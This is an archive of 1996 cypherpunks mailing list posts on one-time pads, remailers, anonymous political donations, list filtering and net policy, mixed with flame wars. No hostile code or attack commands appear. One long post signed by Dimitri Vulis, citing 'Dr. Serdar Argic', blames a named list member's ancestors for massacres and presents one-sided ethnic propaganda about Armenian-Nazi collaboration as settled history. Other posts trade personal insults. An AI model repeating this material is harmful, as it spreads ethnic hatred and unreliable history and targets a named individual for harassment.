Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu> writes:

> Dr.Dimitri Vulis KOTM said:
> >
> > Dr. Serdar Argic is a world-famous historian
>
> Hmm, that's odd, I had heard he was a CSci grad student here.
>
> I guess I'll have to take a stroll over and check out the PhD thesis,
> probably subtitled "Determining meaning of words by usage; Turkey
> can also be a bird".

Yes. Timmy May is a fat turkey.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: silenced@meaning.com
Date: Mon, 21 Oct 1996 20:10:22 -0700 (PDT)
To: radikal@dds.nl
Subject: Radikal in English
Message-ID: <199610220310.UAA20972@black.colossus.net>
MIME-Version: 1.0
Content-Type: text




Rough English translations of issues 153 and 154 of _Radikal_, a German
newspaper from-and for-the radikal/autonomous left, are now available at:

http://www.meaning.com/library/radikal/

The newspaper has been banned by the German government.
I have no connection with the organization and had never heard of them
prior to the German government's attempted blocking of xs4all.nl.

-silenced (silenced@meaning.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 20:20:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: OTP
In-Reply-To: <845910392.8251.0@fatmans.demon.co.uk>
Message-ID: <67c7VD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Where do these idiots come from and why do they end up on this mailing list?

paul@fatmans.demon.co.uk writes:

>
> > Can you explain to me how your one time pad algorithm is any better than
> > encryption something with, say, RC4 or any other cipher using a key that
> > is the same length as the seed for your PRNG?
>
> Well for a start there is no possible cryptanalytic (rather than
> brute force) attack on a one time pad, the system can be
> mathematically proven to be secure with a very simple bit of
> statistics.

Please post your "mathematical proof" and explain what you mean by
a "brute force attack on a one time pad".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 21 Oct 1996 14:03:31 -0700 (PDT)
To: William Davidheiser <wgd@netcom.com>
Subject: Re: Writing A Remailer
In-Reply-To: <2.2.32.19961020160623.006ba1a8@netcom18.netcom.com>
Message-ID: <Pine.LNX.3.94.961021210013.648A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, William Davidheiser wrote:

> Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
> shell account. I am familiar with Windows socket programming (C/C++) but
> have never done anything in the UNIX environment.
> 
> Any pointers on where I should start?
> 
> Thx a bunch ---
>         billd
> 
> 
> 

you'll find that most of the socket function names were stolen from UNIX
anyway...

try 'man <FUNCTION>' at the prompt, were function is a sockets function,
if its in UNIX, it'll tell you the full documentation of the function.

 --Deviant
"The C Programming Language -- A language which combines the flexibility of
assembly language with the power of assembly language."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 21 Oct 1996 21:09:41 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <NH76VD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961021210404.21193D-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 21 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> You have to beg. You have to grovel. You have to prove yourselves
> worthy of the honor.

So it IS intellectual dishonesty and cowardice.  I thought so.
Is there anyone on the list who thinks Dimitri is a man?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 21 Oct 1996 21:25:43 -0700 (PDT)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Stopping the buying of candidates
Message-ID: <199610220425.VAA15124@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 AM 10/17/96 -0800, Timothy C. May wrote:
>
>There are several swirling threads about the development of crypto systems
>(e.g., "binding cryptography," "key recovery," "one-way traceable e-cash")
>that are designed to allow law enforcement some ability to track illegal
>transactions, catch some criminals, etc.

One of the other items on my wish-list (short of a more, uh, "permanent" 
solution to politics) is a system to actually enforce the anonymity of 
political donations.  What I mean is this:  As bad as a large political 
contribution is, what's worse is that the candidate who receives it knows 
who it is from, and how large it is, etc.  Given the recent flap over the 
Indonesian donations to the DNC, it seems to me that it would actually clean 
up politics if there were a mechanism to collect donations, blind them and 
send them to the proper candidate, but hide the actual source of that money. 
 Hide it from the candidates, not necessarily the anyone else. 

This may sound difficult.  After all, it will be argued that a given 
contributor will want to take credit for a donation and tell those who 
receive it; one way to help avoid this is the assess huge penalities (say, 
10 times the value of the contribution claimed) to the party or candidate 
who is told of the source of a contribution but does not report the breach 
of security.  The system could be set up to actually encourage people to 
test it and report fraud, and perhaps be awarded anonymously for providing 
evidence of misbehavior; and people should be able to (falsely) claim credit 
for donations, at least to the candidates themselves.  

Any donation reported to a candidate must be declared by the candidate and 
is then lost; their motivation for reporting it is that it'll be lost 10x if 
they don't.  

The result should be that the candidates should have no idea where the money is 
actually coming from, only that they are getting it.  The contributors 
should be able to verify (via some sort of encrypted-open-books system) that 
the money they donate is actually being credited to the candidates, but they 
should not be able to use this system to prove to the candidate they made 
the contribution.

I really wish those people who are developing that "binding cryptography" 
proposal would change their minds and decide to work on a proposal such as 
this, one that might actually help fix the political money problem.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lsurfer@cris.com (Randy Bradakis)
Date: Mon, 21 Oct 1996 19:06:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: More threats from FOTM (Friends of Timmy May)
In-Reply-To: <$m2n19346-.Pine.GSO.3.95.961016073518.7980B-100000@use.usit.net>
Message-ID: <RdCbyozvQsBA091yn@cris.com>
MIME-Version: 1.0
Content-Type: text/plain


Nyekulturnoo?

nYEH KulTCHURnoo, I think is the vaguely phonetic spelling.
And I don't recall _where_ I remember that from.

The human formerly known as "bdolan@USIT.NET (Brad Dolan)" wrote:
{Something like "ne(o)cultorney," I think.
{On Tue, 15 Oct 1996, Sandy Sandfort wrote:
{> Does anyone remember the Russian word for "uncultured"?  It was
{> in one or two of Tom Clancy's books.

-- 
no sig too small




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 21 Oct 1996 19:10:08 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Prof Shamir arrested
Message-ID: <9610220209.AB21034@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi Jim!
Could you please tell me where I could find more about it?  Is there a URL
presenting the story?  Did you broadcast the story to other groups?

On 21 Oct 96 at 14:34, jim bell wrote:

> Further recall that the so-called "Bit Tax" idea, the one most recently 
> proposed by that Belgian (?) Luc Soete, would apparently require that any
data
> transmitter keep account of any data it sends, in order to collect some sort
> of tax, and thus any mistake in the count (either as a result of
> misinterpretation of the rules, or a disk crash, or a power surge, etc)
would
> presumably turn a minor error into "tax fraud," or maybe they'll call it
"bit
> fraud."

There is one other thing that you probably saw but did not point out:  At least

here in North America, networks and cables are *privately* owned.  A bit tax
would thus tax the use of private property by it's ownner.  That is going a bit

far!  Also, the only one who could file for fraud is the owner.  Otherwise, I
could file a complaint and charge you for fraud that there are too much fart
marks in your underwear...  Or maybe they could institute a spoon and fork

tax.  Or a comma or alphabet tax, why not since it is in the same line?

This is absolutely absurd and anybody planning such a scheme has *much more*
than innocent intentions in mind.

Ciao

jfa
- -- 
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest of Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing.
PGP encryption keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D  : 152ACCBCD4A481B0 254011193237822C 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMmu/r8iycyXFit0NAQEePQf/TPFiji22lXaInCLXlYXJcJL+e8sHgk+r
JXJ6n+54R81rJMTCOh6pSI/KzckXoBVpu8YEUTh46XcZICldzJGF1C5wHca9uJy9
MebhB+ccAAwxjELTbbSTUTYh/1cIHyJiucY6h3Vy/q3TAu3tJx5H248EAOvr21wc
pfBp9nqAsC+WlHku1uhmOj9JbErGIhxW9rISYHNOQiCfIl1z1DPxVtac0zptG0Br
Z8WDRQsOdXB6Efo8/n9oEdpJt5MaUgZdW1Ocz+bLsvQ6LdmfG5KenGYd4vW2nn2y
8tDdB9BOW5FMUFBatw7vfANOhT3O52paZ0qDJRAsJRG069MgfcrRdA==
=ROpW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 21 Oct 1996 19:16:22 -0700 (PDT)
To: jimbell@pacifier.com
Subject: (Fwd) Re: Prof Shamir arrested
Message-ID: <9610220215.AA21528@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi Jim!
Could you please tell me where I could find more about it?  Is there a URL
presenting the story?  Did you broadcast the story to other groups?

On 21 Oct 96 at 14:34, jim bell wrote:

> Further recall that the so-called "Bit Tax" idea, the one most recently 
> proposed by that Belgian (?) Luc Soete, would apparently require that any
data
> transmitter keep account of any data it sends, in order to collect some sort
> of tax, and thus any mistake in the count (either as a result of
> misinterpretation of the rules, or a disk crash, or a power surge, etc)
would
> presumably turn a minor error into "tax fraud," or maybe they'll call it
"bit
> fraud."

There is one other thing that you probably saw but did not point out:  At least

here in North America, networks and cables are *privately* owned.  A bit tax
would thus tax the use of private property by it's ownner.  That is going a bit

far!  Also, the only one who could file for fraud is the owner.  Otherwise, I
could file a complaint and charge you for fraud that there are too much fart
marks in your underwear...  Or maybe they could institute a spoon and fork

tax.  Or a comma or alphabet tax, why not since it is in the same line?

This is absolutely absurd and anybody planning such a scheme has *much more*
than innocent intentions in mind.

Ciao

jfa
- -- 
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest of Limoges porcelain and crystal
 JFA Technologies, R&D consultants
    physicists and engineers, LabView programing.
PGP encryption keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
ID# 5B51964D  : 152ACCBCD4A481B0 254011193237822C 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMmu/r8iycyXFit0NAQEePQf/TPFiji22lXaInCLXlYXJcJL+e8sHgk+r
JXJ6n+54R81rJMTCOh6pSI/KzckXoBVpu8YEUTh46XcZICldzJGF1C5wHca9uJy9
MebhB+ccAAwxjELTbbSTUTYh/1cIHyJiucY6h3Vy/q3TAu3tJx5H248EAOvr21wc
pfBp9nqAsC+WlHku1uhmOj9JbErGIhxW9rISYHNOQiCfIl1z1DPxVtac0zptG0Br
Z8WDRQsOdXB6Efo8/n9oEdpJt5MaUgZdW1Ocz+bLsvQ6LdmfG5KenGYd4vW2nn2y
8tDdB9BOW5FMUFBatw7vfANOhT3O52paZ0qDJRAsJRG069MgfcrRdA==
=ROpW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 21 Oct 1996 22:41:35 -0700 (PDT)
To: Michael Peponis <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems [RANT]
In-Reply-To: <ask5VD23w165w@bwalk.dm.com>
Message-ID: <326C5B77.650D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Michael Peponis wrote:
> :> > > Vulis, grow up.
> That about sums it up.
> It's one thing to  endlessly insult Tim May.  I can just ignore those.
> It's another thing to send huge files full of irrevelent bable about
> genocide in some third world country that I have to wait till it
> downloads before I can make the determination that it's pure garbage.
> (No, I don't killfile people on this list, maybe I should start)

[snip]

Gee, genocide everywhere. If you say the word often enough, it loses some of its sting, 
doesn't it?  How does it make you feel to know that you're here because your ancestors 
survived, probably because they were ruthless enough to trample on those less able to 
defend themselves.  Now I'm gonna catch hell for posting more noise, so all together 
now, let's stick our heads back in the sand.  It's not our responsibility, 'cause after 
all, we're just crypto people.

BTW, that Vulis post was a *lot* larger than necessary.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Mon, 21 Oct 1996 22:52:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: improving cpunk S/N via grouplens/filtering
In-Reply-To: <199610212000.NAA29809@netcom22.netcom.com>
Message-ID: <m24tjntuhj.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Vladimir" == Vladimir Z Nuri <vznuri@netcom.com> writes:

 [GroupLens]

Vladimir> http://www.cs.umn.edu/Research/GroupLens/grouplens.html

Vladimir> is anyone here familiar with this project? what do you think
Vladimir> about how effective it is?

I like the idea, but they've never covered anything other than Usenet,
and newsgroups I don't read.

The little feedback we've gotten after putting it in Gnus indicates
either that it is not useful, or that it probably hasn't reached
critical mass yet.

I proposed GroupLensing this list to Brad early this year, but he
never followed up on it.

To the luser who unsubscribed last week after complaining about his
wimpy mail program, I would add:
Gnus runs on Emacs 19.34 which fully supports Microsoft Windows and is
available as a precompiled binary, so there is no excuse for using
mail and newsreading software on that platform without threading,
sorting, kill files, etc.  Add in the mailcrypt package and an
up-to-date copy of Raph's remailer list, and you have basically point
and click access to remailer chaining and PGP.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rcgraves@ix.netcom.com (Rich Graves)
Date: Mon, 21 Oct 1996 23:22:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Interesting article on ATM in Wired (of all places)
Message-ID: <199610220622.XAA26959@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Since I ordinarily do nothing but bash the journal of hype and unreadable
blue-on-orange type, I figured I should express appreciation for Steve
Steinberg's "Netheads vs. Bellheads" article starting on page 145 of the
October issue. The ATM v. real networks battle is one that is becoming
increasingly important at gads of institutions, such as mine. In addition
to economic efficiency, there are civil liberties reasons to favor the
current packet-switched technology over circuit-switched bit-mangling. The
nexus on this technical front isn't as tight as it is on the encryption
front, but I'd urge people in positions of technical or budgetary
responsibility to line up with the good guys, i.e., us netheads. You don't
want an Internet controlled by ATM technology. It would make censorship,
wiretapping, and other forms of nastiness by government and other armed
thugs far too easy. I'm speaking only for myself, of course, and of course
there are technical reasons I'd prefer to implement gigabit Ethernet as
well. 

The leader "Why the net should grow up" in the October 19th issue of _The
Economist_, whose net reporting has improved markedly with the addition of
some new staff, may also be of interest. Some overlaps with the Wired
article, though the writers probably weren't technically savvy enough to
realize that they were talking about the same thing. More comments on that
when I find time. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: naphis@alias.cyberpass.net (Naphisto)
Date: Mon, 21 Oct 1996 23:45:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: How to get Winsock Remailer 1.3 to Remail?
Message-ID: <199610220624.XAA22638@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

It could retrieve the messages that were supposed to be remailed but it 
wouldn't remail. Could someone please help me to interprete an extract from  
the debug.asc file to see what I have incorrectly?

10/19/1996 14:48:23 SMTP:  Timeout during state 18
10/19/1996 14:49:15 SMTP:  Server reports error 550
10/19/1996 14:50:18 SMTP:  Timeout during state 18
10/19/1996 14:51:09 SMTP:  Server reports error 550
10/19/1996 15:01:08 SMTP:  Server reports error 550

Thank you.

Naphisto







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 21 Oct 1996 22:33:23 -0700 (PDT)
To: sunder@brainlink.com (Ray Arachelian)
Subject: Re: WOW!
In-Reply-To: <Pine.SUN.3.91.961021192936.11167G-100000@beast.brainlink.com>
Message-ID: <199610220503.AAA06670@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ray Arachelian wrote:
> On Mon, 14 Oct 1996, Sandy Sandfort wrote:
> > I just totaled up the "Bring Dimitri to San Francisco" pledges.
> > The pledges add up to an amazing US$681 and some guava pastries.
> > Airfair should be around US$300.  That, plus hotel should come

Hey, where did you find such a cheap airfare? A really good friend of
mine wants to fly to SF from NY and is looking for cheap deals (if they
do not involve too many stops).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 21:30:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Fan mail from John Gilmore
In-Reply-To: <199610220113.SAA19070@toad.com>
Message-ID: <0Rm7VD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>Message-Id: <199610220113.SAA19070@toad.com>
>X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol
>To: dlv@bwalk.dm.com, gnu@toad.com
>Subject: Please stop the off-topic and insulting posts in cypherpunks
>Date: Mon, 21 Oct 1996 18:13:22 -0700
>From: John Gilmore <gnu@toad.com>
>
>Whatever good opinion I had of you is quickly disappearing.  You seem
>to either have no self-control or you have decided not to exert it.
>
>If you plan to continue your current course, I suggest that instead,
>you leave the cypherpunks list(s) and find somewhere else to vent your
>anguish.  Perhaps there is a place where people will care to hear what
>you have to say.
>
>Thanks,
>
>	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 21:30:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray "GAK" Arachelian's role in the murder of 2,500,000 Turks, Kurds, and Sephardic Jews
In-Reply-To: <Pine.SUN.3.91.961021113124.7879B-100000@beast.brainlink.com>
Message-ID: <kum7VD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> On Sun, 20 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > > The friend and colleague of your whom you know says much about you. Yet
> > > another Net Loon. You action of posting a 48K spam to this list in attemp
> > > to get me upset has resulted in a single, half-felt yawn.  Others may be
> > > pissed at your attempt at spamming me.  I give not a shit.
> >
> > Dr. Serdar Argic is a world-famous historian and Ray makes
> > mistakes in English.
>
> And both your points are totally irrelevant, if not outright wrong.
>
> > > My original message to you stands: Vulis, grow up.
>
> <51Kb spam message deleted.>
>
> Vulis, this is your 2nd spam to this list which is totally unrelated to
> any cypherpunk issues.  As this is totally off topic, flame mail, and
> spam, I suggest you grow up.  Again my original message to you stand:
> grow up.

Nonsense. Timmy, Sandy, and a few other jerks on this mailing list are
obsessed with my alleged Cossack (???) ethnicity. The massacres perpetrated
by the grandparents and cousins of the censorous flamer, who actually
distributes a "filtered" version of the mailing list - with responses to his
flames edited out, is more on-topic than anything Timmy May has ever posted.

> 2nd, since you are bent on sending your flames to this list, I move to
> vote you off the list.
>
> Have a nice day.

And I move to vote Timmy May off the list for lying, forging quotes,
posting flame bait and personal attacks, and generally being a jerk.

P.S. My good friend and colleague, the world-famous historian Dr. Serdar
Argic, has cited this additional information about Ray's grandparents:

 _Mitteilungsblatt_ Berlin, December 1939, Nr. 2 and 5-6

 Yet another historical fact: a fact that for years has been deliberately
 forgotten, concealed, and wiped from memory - the fact of Armenian-Nazi
 collaboration.

 A magazine called Mitteilungsblatt der Deutsch-Armenischen Gesselschaft
 is the clearest and most definite proof of this collaboration. The
 magazine was first published in Berlin in 1938 during Nazi rule of
 Germany and continued publication until the end of 1944. Even the
 name of the magazine, which implies a declaration of Armenian-Nazi
 cooperation, is attention-getting.

 This magazine, every issue of which proves the collaboration, is
 historically important as documentary evidence. It is a heap of
 writing that should be an admonition to world opinion and to all
 mankind.

 In Nazi Germany, Armenians were considered to be an Aryan race and
 certain political, economic, and social rights were thus granted to
 them. They occupied positions in public service and were partners in
 Nazi practices. The whole world of course knows what awaited those
 who were not considered _Aryan_ and what befell them.



The Tzeghagrons (Armenian Racial Patriots -- Nazi Armenians) was the
youth organization of the Armenians. It was based in Boston (where
Muslim/Jewish Holocaust apologists of SDPA/Armenian Church are located)
but had followers in Armenian colonies all over the world. Literally
Tzeghagron means _to make a religion of one's race._ The architect
of the Armenian Racial Patriots was Garegin Nezhdeh, a Nazi Armenian
who became a key leader of collaboration with Hitler in World War II.
In 1933, he had been invited to the United States by the Central
Committee of the Armenians to inspire and organize the American-Armenian
youth. Nezhdeh succeeded in unifying many local Armenian youth groups
in the Tzeghagrons. Starting with 20 chapters in the initial year, the
Tzeghagrons grew to 60 chapters and became the largest and most powerful
Nazi Armenian organization. Nezhdeh also provided the Tzeghagrons with
a philosophy:

 _The Racial Religious beliefs in his racial blood as a deity.
  Race above everything and before everything. Race comes first._[1]

[1] Quoted in John Roy Carlson (real name Arthur Derounian),
    _Armenian Affairs_ Winter, 1949-50, p. 19, footnote.



The Armenians were deeply anti-semitic as well. In the May 10,
1936 edition of _Hairenik Weekly_ (an official mouthpiece for
the ex-Soviet Armenian Government) the vice-mayor of Bucharest,
Rumania is quoted as saying:

_The Armenians helped us not to become the slaves of the Jewish
 elements in our country._

In another edition, an author named Captain George Haig writes:

_And the type of Jew who is imported to Palestine...is not anything
 to be proud about. Their loose morals, and other vices were
 unknown to the Arabs prior to Balfour Declaration, on top of
 all communist activities were the cause of most of the Arab
 criticism._[1]

[1] Captain George Haig, _The Case of Palestine_ in Hairenik
    Weekly, Friday, September 25, 1936.




As amply admitted by the ex-Soviet Armenian Government,
the Armenians were also fascist. Before Pearl Harbor,
the Dashnak daily _Hairenik_ [an official mouthpiece
for the ex-Soviet Armenian Government] (not to be confused
with the Tzeghagrons _Hairenik Weekly_) expressed pro-Nazi
sentiments:

_And came Adolf Hitler, after herculean struggles. He spoke
 to the racial heart strings of the German, opened the
 fountain of his national genius, strock down the spirit
 of defeatism...At no period since the World War had Berlin
 conducted so realistic, well organized, and planned policy
 as now, since Hitler's assumption to power...And whatever
 others may think concerning Hitlerism and Fascism as a
 system of Government, it is proved that they have revitalized
 and regenerated the two states, Germany and Italy._[1]

[1] _Hairenik_ official organ of the Dashnaktsuitune, Sept.
    17, 1936; quoted in John Roy Carlson (see endnote 1), p. 21.


  During World War II, while the Turkish Government was giving
  asylum to many Jews fleeing from Hitler's tyranny, anti-Semitism
  engulfed the Armenian circles in the Nazi-occupied territories.
  A publication of the Armenian Information Service in New York,
  entitled Dashnak Collaboration With The Nazi Regime, purports
  to show that Armenian sympathies with racism had reached dangerous
  proportions. The following quotation from the Armenian daily
  Hairenik of 19, 20 and 21 August 1936 exposes something much
  more than prejudice and bigotry:

   _Jews being the most fanatical nationalists and race-worshippers...
    are compelled to create an atmosphere..of internationalism and
    world citizenship in order to preserve their race...As the
    British use battleships to occupy lands..Jews use internationalism
    or communism as a weapon..Sometimes it is difficult to eradicate
    these poisonous elements when they have struck deep root like
    a chronic disease. And when it becomes necessary for a people
    to eradicate them...these attempts are regarded revolutionary.
    During a surgical operation, the flow of blood is a natural
    thing...Under such conditions, dictatorships seem to have a role
    of saviour [1]._

  [1] Quoted by James Mandalian: _Who are the Dashnags?_ Boston,
      Hairenik Press, 1944, pp. 13-4.



  In May 1935 the Armenians of Bucharest attacked the Jews of that
  city, while the Greeks of Salonika attacked the Jews in the August
  of the same year. During World War II, Armenian volunteers, under
  the wings of Hitler's Germany, were used in rounding up Jews and
  other ''undesirables'' destined for the Nazi concentration camps.
  The Armenians also published a German-language magazine, with fascist
  and anti-Semitic tendencies, supporting Nazi doctrines directed to
  the extermination of 'inferior' races [1].

  This is confirmed by Armenophil Christopher J. Walker, who admits
  that the Armenians collaborated with the Nazis. According to him,
  members of the Dashnak Party, then living in the occupied areas,
  including a number of prominent persons, entertained pro-Axis
  sympathies. A report in an American magazine went so far as to
  claim that the Nazis had picked on the Dashnaktsutiun to do fifth-
  column work, promising the party an autonomous state for its
  cooperation. Walker goes on to claim that relations between the
  Nazis and the Dashnaks living in the occupied areas were close and
  active. On 30 December 1941 an Armenian battalion was formed by a
  decision of the Army Command (Wehrmacht), known as the 'Armenian
  812th Battalion'. It was commanded by Dro, and was made up of a
  small number of committed recruits, and a larger number of Armenians.
  Early on, the total number of recruits was 8,000; this number later
  grew to 30,000. The 812th Battalion was operational in Crimea and
  the North Caucasus.(These are the dates and numbers given by Walker[3].)

  A year later, on 15 December 1942, an Armenian National Council
  was granted official recognition by Alfred Rosenberg, the German
  Minister of the occupied areas. The Council's president was
  Professor Ardashes Abeghian, its vice-president Abraham Giulkhandanian,
  and it numbered among its members Nzhdeh and Vahan Papazian. From that
  date until the end of 1944 it published a weekly journal, Armenien,
  edited by Viken Shant (the son of Levon), who also broadcast on Radio
  Berlin. The whole idea was to prove to the Germans that the Armenians
  were 'Aryans'. With the aid of Dr. Paul Rohrbach they seemed to have
  achieved this as the Nazis did not persecute the Armenians in the
  occupied lands [2].

  [1] Turkkaya Ataov: _Armenian Extermination of the Jews and Muslims_
      1984, p. 91.
  [2] C.J. Walker: _Armenia_ London, 1980, pp. 356-8.



  _Emperor Romanus I Lecapenus, in about 935, again ordered the
  forcible conversion of all the Jews of Byzantium, leading to the
  murder of hundreds of Jews and the desecration of many synagogues
  throughout the empire. All the while Jews came under increasingly
  savage attack by Byzantine popular preachers and writers as well as
  by officials trying to stir the populace in support of the Crusading
  knights coming from the West to wrest the Holy Land from the "infidel
  Muslims". As a result, Emperor Andronicus I Comnenus (1183-85) again
  attempted to convert the Jews to Christianity, though by persuasion
  and argument rather than force. When Crusaders passed through
  Constantinople on their way to the Holy Land, they invariably were
  assigned to camp next to the Jewish quarters, particularly that
  adjacent to the Galata Tower, and usually spent most of their spare
  time attacking and killing Jews and stealing their properties. At the
  same time they stirred local populace to similar activities. It was
  at this time, also, that Constantinople's Armenians joined the Greeks
  in attacking Judaism for the first time. [1]_

  [1] Yvonne Friedman, 'Antijudischen Polemik des 12 jahrhunderts',
      Kairos XXVI/1-2 (1984), 80-88.


  ''Blood libel accusations were made against Jews by Ottoman Christian
  subjects starting in the sixteenth century, most frequently in the
  Arab provinces, first at Jerusalem in 1546. The most famous Christian
  assault on Ottoman Jews in medieval times came in the central Anatolian
  town of Amasya some time between 1530 and 1540, when a blood-libel
  accusation against local Jews was spread by local Armenians who said
  that an Armenian woman had seen Jews slaughter a young Armenian boy
  and use his blood at the feast of Passover. Several days of rioting
  and pillaging and attacks on Jews followed...Later, however, the
  Armenian boy who supposedly had been murdered was found and the
  Ottoman governor punished the Armenian accusers, though nothing could
  be done about the Jews who had suffered.''[1]

  ''There were literally thousands of incidents in subsequent years,
  invariably resulting from accusations spread among Greeks and Armenians
  by word of mouth, or published in their newspapers, often by Christian
  financiers and merchants who were anxious to get the Jews out of the
  way, resulting in isolated and mob attacks on Jews, and burning of
  their shops and homes [2]. The attacks were brutal and without mercy.
  Women, children, and aged Jewish men were frequently attacked, beaten
  and often killed.''[3]

  [1] Stanford J. Shaw, ''Christian Anti-Semitism in the Ottoman Empire'',
      Belleten C. LIV, 68, p.1103 (1991).
  [2] Abraham Ben-Yakob (Jerusalem), ''The Immigration of Iraki Jews
      to the Holy Land in the 19th Century'', paper delivered to the
      First International Congress for the Study of Sephardic and
      Oriental Judaism, 27 June 1978.
  [3] Stanford J. Shaw, ''Christian Anti-Semitism in the Ottoman Empire'',
      Belleten C. LIV, 68, p.1129 (1991)


  By Andrew Sackser:

  Throughout history the children of  Israel have suffered at hands
  of  others. A  people set  apart  from their  neighbors by  their
  faith, countless. Jews have often had  to pay for this faith with
  their lives.  There was,  however, one haven  where Jews  did not
  suffer  the large-scale  persecution characterizing  their entire
  existence. This  haven was  Turkey. For  over five  hundred years
  Jews  have flourished  there,  enjoying relatively  uninterrupted
  freedom and  safety that has  only been rivaled in  America. This
  year marks  the quincentennial anniversary of  the ingathering of
  Jews to  Turkey, and highlights  one of the brighter  chapters in
  Jewish history.
  ...
  Source: HIRHURIM - The Jewish Magazine of Brendeis University
  (Massachusetts). Vol. 1, No: 2, Spring 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 21:40:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Chinese internal internet
In-Reply-To: <01IAWMVWDQSGA733QP@mbcl.rutgers.edu>
Message-ID: <3iN7VD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


